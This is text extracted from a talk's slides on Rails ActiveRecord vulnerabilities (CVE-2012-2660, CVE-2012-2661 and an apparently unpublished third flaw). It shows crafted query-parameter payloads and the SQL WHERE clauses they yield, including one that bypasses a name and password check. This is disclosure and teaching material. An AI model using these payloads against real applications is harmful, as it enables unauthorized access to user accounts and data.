Rails VulnerabilitiesLast WeekCVE-2012-2660CVE-2012-2661
View Slide
CVE-2012-2660Allows unexpected “IS NULL” in queriesAffects Rails 2.x and 3.x
ActiveRecord Queryunless params[:name].nil?@user = User.where(:name => params[:name])end
Query Parameters?name[]{"name"=>[nil]}
ActiveRecord Queryunless [nil].nil?@user = User.where(:name => [nil])end
Resulting SQLSELECT "users".* FROM "users" WHERE"users"."name" IS NULL
CVE-2012-2661Allows some manipulation of WHERE clausevia “dotted” query keysAffects Rails 3.x
ActiveRecord QueryUser.where(:name => params[:name])
ActiveRecord QueryUser.where("users.name" => params[:name])
Query Parameters?name[users.id]=1{"name"=>{"users.id"=>"1"}}
ActiveRecord QueryUser.where(:name => {"users.id" => "1"})
Resulting SQLSELECT "users".* FROM "users" WHERE "users"."id" = 1
Unreleased VulnerabilityAllows some manipulation of WHERE clausevia nested hashes in query valuesAffects 2.3.x and 3.x
ActiveRecord QueryUser.where(:name => params[:name],:password => params[:password])
Query Parameters?name[users][id]=1&password[users][id]=1{"name"=>{"users"=>{"id"=>"1"}}, "password"=>{"users"=>{"id"=>"1"}}}
ActiveRecord QueryUser.where(:name => {"users"=>{"id"=>"1"},:password => {"users"=>{"id"=>"1"} )
Resulting SQLSELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."id" = 1